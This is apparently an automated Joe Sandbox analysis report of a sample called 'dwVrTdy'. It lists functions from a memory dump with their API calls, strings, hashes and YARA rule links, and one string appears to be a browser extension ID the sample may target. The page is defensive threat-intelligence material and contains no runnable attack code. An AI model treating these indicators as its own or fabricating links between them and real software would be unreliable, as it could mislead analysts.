Opcode ID: eaa275e36fc8740e3ab67c74447eb186e29681fa32f73f9bf3f495bad34426d8
Instruction ID: 92f564955106b1759d463fe8b0a8511516b6ddf6076c222c8a53952f5bd1ce58
Opcode Fuzzy Hash: eaa275e36fc8740e3ab67c74447eb186e29681fa32f73f9bf3f495bad34426d8
Instruction Fuzzy Hash: 4F61B222E1CB8292EA94FB11E5513BA6361FB95780F40A131EA5D97BD2DF7CE5909300

Function 00007FF643F64A90 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF643F64ABB
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF643F64B52
RtlUnwindEx.KERNEL32(?,?,?,?,?,?,?,00007FF643F636BA), ref: 00007FF643F64BAC

Strings

csm, xrefs: 00007FF643F64B39

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: 755a5fe7f73a5d689be82d0671b68300f10bb52e7acddf2d664537cb0fed4d16
Instruction ID: 9efa84d881758f7359b35182ab94620d043ca95acd6a6eaffd506d8453d96fa7
Opcode Fuzzy Hash: 755a5fe7f73a5d689be82d0671b68300f10bb52e7acddf2d664537cb0fed4d16
Instruction Fuzzy Hash: CE51BC32B0DA028ADB94FF15E445A383795EB44B98F609134EA4A937C8DF7DE842E700

Function 00007FF643F661D4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF643F66233
_CallSETranslator.LIBVCRUNTIME ref: 00007FF643F6627F

Strings

MOC, xrefs: 00007FF643F66247
RCC, xrefs: 00007FF643F6624F

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 3a355bcac8b81883a2ccad545a664a2c8bdd8461706ace05c86d8c2225779f94
Instruction ID: 32345a96912f1ecab7e83af02911ff1c6cc01bdd507f71d1b22f0fe8bf3f7ba3
Opcode Fuzzy Hash: 3a355bcac8b81883a2ccad545a664a2c8bdd8461706ace05c86d8c2225779f94
Instruction Fuzzy Hash: 3D61913290CBC581EBA0AF15E4423AAB7A0FB85B84F045235EB9D53B95DF3CD095CB00

Function 00007FF643F669C4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF643F669EC
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF643F66AD4

Strings

csm, xrefs: 00007FF643F66A0E
csm, xrefs: 00007FF643F66B26

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: 6b8a965ca43953807a5e732a6252003fd0f606180e286370bd46e2709a45e06e
Instruction ID: 38afd93c6903bf77e7a2e9d4849597f6751d5c696445f8b1389afb6c86f0b795
Opcode Fuzzy Hash: 6b8a965ca43953807a5e732a6252003fd0f606180e286370bd46e2709a45e06e
Instruction Fuzzy Hash: E751A232A0C282C6FBB4BF11954536877A0EB55B94F14A239DA5CA7BD5CF3CE452D700

Function 00007FF643F57260 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF643F572CB
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF643F57313
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF643F573A3

Strings

bad locale name, xrefs: 00007FF643F573C6

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 2775327233-1405518554
Opcode ID: db4bce26198b54ce531c376d77e15760e6518d1566bbb4eecdd7fd0827ca7ab9
Instruction ID: 7e3429f3ae6278b81fdd2a9a1bbb7e147b1bd471592d7a84ce8fe2874971d8fd
Opcode Fuzzy Hash: db4bce26198b54ce531c376d77e15760e6518d1566bbb4eecdd7fd0827ca7ab9
Instruction Fuzzy Hash: 4C416E22B0EA41D9FBA4FF71D4922BC2364EF54748F084034DE4DB7AA6DE38D556A308

Function 00007FF643F28880 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 126COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F28A83

Strings

ios_base::eofbit set, xrefs: 00007FF643F28A47
ios_base::failbit set, xrefs: 00007FF643F28A40
ios_base::badbit set, xrefs: 00007FF643F28A34

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3668304517-1866435925
Opcode ID: 6f497c1ce9e5e04c61fb24ff877b0b05fda8846542b56cd27f43f2303514b95d
Instruction ID: ec2385233b2568ed970cbf0c94a4ee7e122cee709f6b26f838de9945f72079b9
Opcode Fuzzy Hash: 6f497c1ce9e5e04c61fb24ff877b0b05fda8846542b56cd27f43f2303514b95d
Instruction Fuzzy Hash: 35518F32A0CA81C5EB80EF24D4923A973A0FB84B88F548532DB4C93BA9DF3DD445DB40

Function 00007FF643F45330 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF643F4539B
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF643F453E3
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF643F45473

Strings

bad locale name, xrefs: 00007FF643F45496

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 2775327233-1405518554
Opcode ID: 81cb8670b555a8e31db84782e2a5718fe23077a2ab266310f93b689cb9081599
Instruction ID: c6403b64627e8f5229e1e2048b47839c18988977354d071a86056212d1498d72
Opcode Fuzzy Hash: 81cb8670b555a8e31db84782e2a5718fe23077a2ab266310f93b689cb9081599
Instruction Fuzzy Hash: 03414F22B0EA41D9EB94FFB1D4526FC23A4AF64748F044434DE4DB7AA5DE38D512E304

Function 00007FF643F77678 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF643F776F7
WriteFile.KERNEL32 ref: 00007FF643F779BF
WriteFile.KERNEL32 ref: 00007FF643F77A05
GetLastError.KERNEL32 ref: 00007FF643F77ABB

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: faab91da3998636e1b2c1f14adb7718455e8f0148080d24a1a297694853ee6f7
Instruction ID: cc2ed51d1631064780b9f4c77093934af05006f22ca35cfea620809213d1be53
Opcode Fuzzy Hash: faab91da3998636e1b2c1f14adb7718455e8f0148080d24a1a297694853ee6f7
Instruction Fuzzy Hash: 68D1EE22B1CA818AF750EF69D4416BC37B2EB44B98B144236CE5DA7BD9DF38D50AD340

Function 00007FF643F6E370 Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF643F6E3E9
_invalid_parameter_noinfo.LIBCMT ref: 00007FF643F6E445
_invalid_parameter_noinfo.LIBCMT ref: 00007FF643F6E480
_invalid_parameter_noinfo.LIBCMT ref: 00007FF643F6E4A5

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: e3650d58ace5e01d80639c9bdd661b0cca838cd5a2a9cc277d233d04e7258adf
Instruction ID: 7a85f2f13a8e2b3270c043f7ebec2b6f6a3f525c3b99c50e71cfb0ab6ce7e98e
Opcode Fuzzy Hash: e3650d58ace5e01d80639c9bdd661b0cca838cd5a2a9cc277d233d04e7258adf
Instruction Fuzzy Hash: 6941606790C685C6EB92BF25C4122BD3FA0AF55F84F199071C68C973CADE3D944AE312

Function 00007FF643F5E248 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 00007FF643F5E291
GetLastError.KERNEL32 ref: 00007FF643F5E29F
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,00007FF643F41749), ref: 00007FF643F5E2D4
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00007FF643F41749), ref: 00007FF643F5E2E2

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide
String ID:
API String ID: 203985260-0
Opcode ID: bf6f6ff787d63ec9e95bb80f5333d1c21f0963902c8af30d1e5921e00fe17b2e
Instruction ID: 71b5e29fb42699d44208460216d73b630d43126d1f5557cbf7de81a407e498fd
Opcode Fuzzy Hash: bf6f6ff787d63ec9e95bb80f5333d1c21f0963902c8af30d1e5921e00fe17b2e
Instruction Fuzzy Hash: 04215E72A18B4187E390AF11E40532E76B4FB99B80F144139DB88A3BA9DF3CD4018B00

Function 00007FF643F63938 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF643F63964
GetCurrentThreadId.KERNEL32 ref: 00007FF643F63972
GetCurrentProcessId.KERNEL32 ref: 00007FF643F6397E
QueryPerformanceCounter.KERNEL32 ref: 00007FF643F6398E

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: f0ffd342919842dffd779aa7ca47588310b5acaa36f8272d6a3067b3f271bd00
Instruction ID: 0afb113ea509175926a7fdedaf75cc63ce54dd22b1163c62a5333d66271bcf84
Opcode Fuzzy Hash: f0ffd342919842dffd779aa7ca47588310b5acaa36f8272d6a3067b3f271bd00
Instruction Fuzzy Hash: DF117022B18F028AEB80EF60E8552B833A4FB59758F040E31EE2D977E4DF78D1548340

Function 00007FF643F5E03C Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

SetFileInformationByHandle.KERNEL32 ref: 00007FF643F5E05C
GetLastError.KERNEL32 ref: 00007FF643F5E066
SetFileInformationByHandle.KERNEL32 ref: 00007FF643F5E099
GetLastError.KERNEL32 ref: 00007FF643F5E0A3

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: ErrorFileHandleInformationLast
String ID:
API String ID: 275135790-0
Opcode ID: c3f294a01001bde1e672a3baf64a8f8c8c5e461723a8d9167fea38aa2c63fd5f
Instruction ID: 1d01c9205b65e767e142576008c4c015606cdda7822a2a496e438d83eab87894
Opcode Fuzzy Hash: c3f294a01001bde1e672a3baf64a8f8c8c5e461723a8d9167fea38aa2c63fd5f
Instruction Fuzzy Hash: 94F0D173A0C14282F7E57F70E4562FD36A09F60744F144130CA0AE35F5DE2CEA88A700

Function 00007FF643F50810 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 229COMMON

Download Yara Rule

Strings

Bad escape sequence in string, xrefs: 00007FF643F50BCC
Empty escape sequence in string, xrefs: 00007FF643F50C50

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID:
String ID: Bad escape sequence in string$Empty escape sequence in string
API String ID: 0-928816353
Opcode ID: f45f751ed646c75d4ef6e0c233ee33919e43e3e978761b2a3d09f0e6ffb0bada
Instruction ID: 06907f8919959c740018f2f365ca892b9276ca7e41cf40a27e9c15408986e0c7
Opcode Fuzzy Hash: f45f751ed646c75d4ef6e0c233ee33919e43e3e978761b2a3d09f0e6ffb0bada
Instruction Fuzzy Hash: 6881F033A0D78286EB85BF25D54267D7761EB51BD4F148232DE5DA3BDADE2CE081A300

Function 00007FF643F66BFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF643F66C26

Strings

csm, xrefs: 00007FF643F66C4B
csm, xrefs: 00007FF643F66DBA

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: __except_validate_context_record
String ID: csm$csm
API String ID: 1467352782-3733052814
Opcode ID: c41babcde769611a9ebafd1821e8d1a95b947c620c220eb6377b327e93ce6598
Instruction ID: d3f3f7d57bb71e7c093d47426371b303ea39a801083fcc12ec4e6f8d4f348daa
Opcode Fuzzy Hash: c41babcde769611a9ebafd1821e8d1a95b947c620c220eb6377b327e93ce6598
Instruction Fuzzy Hash: 5D71C07290C68186EBA0BF25D05177D7BA0FB15B89F14A135DA4CA7AC9CF2CD452E700

Function 00007FF643F596C0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F5987A

Strings

, xrefs: 00007FF643F597B0
in Json::Value::getMemberNames(), value must be objectValue, xrefs: 00007FF643F59895

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: $in Json::Value::getMemberNames(), value must be objectValue
API String ID: 3668304517-828478770
Opcode ID: 94ceb3c93b4d6312538c39f797ebae8cf8a178e57db0026f79b34a9f1722b791
Instruction ID: e6b2b084e23ff0725310948c6d1c9d8242f50d266c1b9bc5428abbefac3c5329
Opcode Fuzzy Hash: 94ceb3c93b4d6312538c39f797ebae8cf8a178e57db0026f79b34a9f1722b791
Instruction Fuzzy Hash: BA51C572A1CB8581EA50FF54E4421AEA360FB857D4F509232E69C53EEADF7CE491D700

Function 00007FF643F50D40 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 133COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F50F14

Strings

expecting another \u token to begin the second half of a unicode surrogate pair, xrefs: 00007FF643F50E95
additional six characters expected to parse unicode surrogate pair., xrefs: 00007FF643F50DB2

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: additional six characters expected to parse unicode surrogate pair.$expecting another \u token to begin the second half of a unicode surrogate pair
API String ID: 3668304517-1961466578
Opcode ID: 822c04dc8235e0eebf450844a94c68a091e3b72538353c26546d0cdae63bb6e3
Instruction ID: 8d333aedd6dccb9fbb7d3ef7f071db18a58cc8dfbf773c21613f0316161f01ed
Opcode Fuzzy Hash: 822c04dc8235e0eebf450844a94c68a091e3b72538353c26546d0cdae63bb6e3
Instruction Fuzzy Hash: 0A411862E1C78741EA90BE25E4422796350EB957D4F149231FE9EA37DBDE3CE181A300

Function 00007FF643F44730 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F448D2
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF643F448D8

Strings

egjidjbpglichdcondbcbdnbeeppgdph, xrefs: 00007FF643F44734

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID: egjidjbpglichdcondbcbdnbeeppgdph
API String ID: 73155330-1098953746
Opcode ID: df608a23cbcb3254a10407cb4a3e8e0846cec37c94d7d8e838b6c68aa0c23caa
Instruction ID: 48a226c6d75b779677c926479bbc488a13a5a5d933e6f15574ce64abf9e126a8
Opcode Fuzzy Hash: df608a23cbcb3254a10407cb4a3e8e0846cec37c94d7d8e838b6c68aa0c23caa
Instruction Fuzzy Hash: 9341D061B0DA8191EA94FB11D20527D6290BB64BE8FA40731DE7DA7BD5EF3CE056D300

Function 00007FF643F7D1E4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF643F82074: _invalid_parameter_noinfo.LIBCMT ref: 00007FF643F820A7

_get_daylight.LIBCMT ref: 00007FF643F7D2FC
_get_daylight.LIBCMT ref: 00007FF643F7D30D

Strings

?, xrefs: 00007FF643F7D28D

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: be00a9dea23bf6a1188b66e376131877ecdf6e27db4d46faeb8b136f3d777bd6
Instruction ID: c2b8e96a4e02faf624c982784873fc2f351115b073625bcf2b9c024ea3798630
Opcode Fuzzy Hash: be00a9dea23bf6a1188b66e376131877ecdf6e27db4d46faeb8b136f3d777bd6
Instruction Fuzzy Hash: 99411622A0C38246FBE4BB25A40237A6A60EF81BA4F544236FF5C97AD5EF3CD441D700

Function 00007FF643F67294 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF643F6733E
_CreateFrameInfo.LIBVCRUNTIME ref: 00007FF643F67367

Strings

csm, xrefs: 00007FF643F67467

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: CreateFrameInfo__except_validate_context_record
String ID: csm
API String ID: 2558813199-1018135373
Opcode ID: bba117021f344cf8f4e789ab315634a830666d67b1e2a12394e23247ba1d153d
Instruction ID: c28f3f5812738ec83a79e5f5a475327883f5aaa6ea154c680454e85d561f50ce
Opcode Fuzzy Hash: bba117021f344cf8f4e789ab315634a830666d67b1e2a12394e23247ba1d153d
Instruction Fuzzy Hash: 1A514D72A1DB4186E6A0FB15E04226D77B4FB89B90F102535DB8D97B96CF3CE452DB00

Function 00007FF643F50F20 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F510A5

Strings

Bad unicode escape sequence in string: four digits expected., xrefs: 00007FF643F50F60
Bad unicode escape sequence in string: hexadecimal digit expected., xrefs: 00007FF643F5103D

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
